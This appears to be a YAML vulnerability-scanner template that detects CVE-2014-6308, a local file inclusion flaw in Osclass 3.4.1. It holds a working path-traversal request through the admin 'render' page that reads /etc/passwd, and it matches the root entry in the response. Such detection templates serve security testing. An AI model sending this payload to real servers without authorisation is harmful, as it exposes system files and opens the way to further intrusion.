25 lines
568 B
YAML
25 lines
568 B
YAML
id: CVE-2014-6308
|
|
|
|
info:
|
|
name: Osclass Security Advisory 3.4.1 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html
|
|
tags: cve,cve2014,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|